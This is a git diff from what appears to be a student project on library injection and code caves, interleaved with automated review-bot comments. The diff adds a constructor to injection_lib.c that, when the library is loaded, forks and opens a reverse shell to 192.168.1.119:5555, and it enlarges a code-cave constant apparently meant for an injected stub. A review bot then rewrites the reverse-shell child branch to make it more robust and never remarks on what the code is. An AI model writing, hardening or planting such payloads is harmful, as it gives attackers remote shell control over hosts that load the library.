diff --git a/.gitignore b/.gitignore
index c5f2706..7e2887f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,6 @@
 src/log
 *.aux
-*bcf
+*/document.bcf
 *.blg
 *.fdb_latexmk
 *.fls
diff --git a/src/.output/kit.o b/src/.output/kit.o
index d774bf7..87e4b9d 100644
Binary files a/src/.output/kit.o and b/src/.output/kit.o differ
diff --git a/src/bin/kit b/src/bin/kit
index bba54a0..297c91d 100755
Binary files a/src/bin/kit and b/src/bin/kit differ
diff --git a/src/helpers/.gdb_history b/src/helpers/.gdb_history
index 8f2ffbf..1330718 100644
--- a/src/helpers/.gdb_history
+++ b/src/helpers/.gdb_history
@@ -1,31 +1,3 @@
-q
-checksec
-q
-disass main
-b *(main+446)
-r
-si
-ni
-si
-ni
-si
-q
-b *(main+446)
-r
-x/20i 0x7ffff7ede560
-x/100i 0x7ffff7ede560
-x/1000i 0x7ffff7ede560
-q
-b *(main+446)
-r
-si
-disass /r 0x555555555130
-x/20b 0x555555557fd0
-q
-b timerfd_settime@plt
-r
-si
-q
 disass /r 0x555555555130
 b timerfd_settime
 r
@@ -254,3 +226,31 @@ si
 q
 r
 q
+b *(main+186)
+r
+x/x *(main+186)
+si
+x/4x 0x555555555130
+q
+disass main
+b *(main+52)
+r
+si
+disass main
+b *(main+79)
+r
+c
+si
+q
+r
+q
+r
+q
+r
+r
+q
+b *(main+79)
+r
+si
+ni
+q
diff --git a/src/helpers/injection_lib.c b/src/helpers/injection_lib.c
index 1a290a4..d44a79f 100644
--- a/src/helpers/injection_lib.c
+++ b/src/helpers/injection_lib.c
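Review bot: The narrowed `*/document.bcf` pattern is fine, but this same commit checks in build outputs and debugger state (`src/.output/kit.o`, `src/bin/kit`, `injection_lib.o`, `injection_lib.so`, `.gdb_history`, the new `peda-session-*.txt` files) that no pattern here excludes. Rebuilt binaries will churn on every commit, and `.gdb_history`/peda sessions carry local paths and breakpoint addresses that nobody else needs. Consider adding `*.o`, `*.so`, `src/bin/`, `.gdb_history` and `peda-session-*.txt` to this file and removing the already-tracked copies.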
@@ -1,10 +1,38 @@ #include #include #include +#include +#include +#include +#include +#include +#include + __attribute__((constructor)) static void init() { printf("Library successfully injected!\n"); syslog(LOG_CRIT, "Library called\n"); + + //Just a sample reverse shell (https://www.revshells.com/) + pid_t pid = fork(); + if(pid==0){ + int port = 5555; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr("192.168.1.119"); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"/bin/sh", NULL}; + execve("/bin/sh", argv, NULL); + } } \ No newline at end of file diff --git a/src/helpers/injection_lib.o b/src/helpers/injection_lib.o index ef5b9cf..2515475 100644 Binary files a/src/helpers/injection_lib.o and b/src/helpers/injection_lib.o differ diff --git a/src/helpers/injection_lib.so b/src/helpers/injection_lib.so index f1f4e5e..d62edfb 100755 Binary files a/src/helpers/injection_lib.so and b/src/helpers/injection_lib.so differ diff --git a/src/helpers/peda-session-dash.txt b/src/helpers/peda-session-dash.txt new file mode 100644 index 0000000..70782cb --- /dev/null +++ b/src/helpers/peda-session-dash.txt @@ -0,0 +1,3 @@ +break *(main+79) +disable $bpnum + diff --git a/src/helpers/peda-session-ls.txt b/src/helpers/peda-session-ls.txt new file mode 100644 index 0000000..70782cb --- /dev/null +++ b/src/helpers/peda-session-ls.txt @@ -0,0 +1,3 @@ +break *(main+79) +disable $bpnum + diff --git a/src/helpers/peda-session-simple_open.txt b/src/helpers/peda-session-simple_open.txt index 02b7b86..41ce7a4 100644 --- a/src/helpers/peda-session-simple_open.txt +++ b/src/helpers/peda-session-simple_open.txt @@ -1,2 +1,2 @@ -break /home/osboxes/TFG/src/helpers/simple_open.c:14 +break *(main+79) 
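Review bot: In the child branch neither `socket()` nor `connect()` is checked, so when the connection to 192.168.1.119:5555 fails the child still redirects fds 0–2 onto a dead descriptor and execs `/bin/sh`, and if `socket()` itself returns -1 every `dup2` fails and the shell runs on the host process's own stdin/stdout. Nothing follows `execve` either, so on exec failure the child returns from the constructor and carries on as a second copy of whatever process loaded the library. `revsockaddr` is also never zeroed, so `sin_zero` is sent with indeterminate contents; `= {0}` fixes that. The whole `init` function is inside the hunk; the rewritten child branch below checks both calls and always terminates the child with `_exit`.
```c
    pid_t pid = fork();
    if (pid == 0) {
        int port = 5555;
        struct sockaddr_in revsockaddr = {0};   // zero sin_zero and any padding

        int sockt = socket(AF_INET, SOCK_STREAM, 0);
        if (sockt < 0) _exit(127);               // never run /bin/sh on the host's fds
        revsockaddr.sin_family = AF_INET;
        revsockaddr.sin_port = htons(port);
        revsockaddr.sin_addr.s_addr = inet_addr("192.168.1.119");

        if (connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)) < 0)
            _exit(127);
        // … unchanged: dup2 of sockt onto fds 0, 1 and 2 …
        char * const argv[] = {"/bin/sh", NULL};
        execve("/bin/sh", argv, NULL);
        _exit(127);                              // exec failed: do not fall back into the host process
    }
```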
diff --git a/src/helpers/simple_open b/src/helpers/simple_open index b29b041..1aded34 100755 Binary files a/src/helpers/simple_open and b/src/helpers/simple_open differ diff --git a/src/helpers/simple_open.c b/src/helpers/simple_open.c index b7837b9..452eafb 100644 --- a/src/helpers/simple_open.c +++ b/src/helpers/simple_open.c @@ -15,8 +15,9 @@ int main(int argc, char *argv[]) { int fd; char* path = "/home/osboxes/TFG/src/helpers/Makefile"; openat(fd, path, O_RDONLY); + sleep(1); //Second call openat(fd, path, O_RDONLY); - + sleep(1); return 0; } \ No newline at end of file diff --git a/src/helpers/simple_open.o b/src/helpers/simple_open.o index 0b6d512..f239fc9 100644 Binary files a/src/helpers/simple_open.o and b/src/helpers/simple_open.o differ diff --git a/src/user/include/utils/mem/code_caver.h b/src/user/include/utils/mem/code_caver.h index cea2fb8..7f2ca22 100644 --- a/src/user/include/utils/mem/code_caver.h +++ b/src/user/include/utils/mem/code_caver.h @@ -10,7 +10,7 @@ #include "../common/constants.h" -#define CODE_CAVE_LENGTH_BYTES 0x40 +#define CODE_CAVE_LENGTH_BYTES 0xA0 #define NULL_BYTE 0x00 __u64 cave_find(int mem_fd, int cave_length, __u64 from, __u64 to){
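Review bot: `int fd;` is never initialised, yet it is passed as the dirfd to both `openat` calls that the new `sleep(1)` lines now bracket; because `path` is absolute the kernel ignores the dirfd, but reading an indeterminate value is undefined behaviour in C and `-Wuninitialized` will flag it — use `openat(AT_FDCWD, path, O_RDONLY)` and drop `fd`. The two descriptors `openat` returns are also discarded, so the helper leaks them until exit; capturing and `close`-ing them makes the test deterministic for whatever hook is watching these calls. `sleep` needs `<unistd.h>`, which I cannot see from the hunk — presumably it is included above. `main`'s signature is above the hunk; its closing brace is inside it.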
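Review bot: `CODE_CAVE_LENGTH_BYTES` jumps from 0x40 to 0xA0 with nothing in the hunk relating it to the size of what is written into the cave; if the bump is to fit a larger injected stub, the copy site (not visible here, so inferred) should check the stub length against this constant rather than depend on the number being big enough, e.g. a `_Static_assert(sizeof(stub) <= CODE_CAVE_LENGTH_BYTES, "stub exceeds code cave")` where the stub is defined. Separately, `cave_find` is a full definition with external linkage living in a header, so including `code_caver.h` from a second translation unit will fail to link with a duplicate symbol; declare it `static inline __u64 cave_find(...)` or move the body to a `.c` file. `cave_find`'s body continues past the end of the hunk.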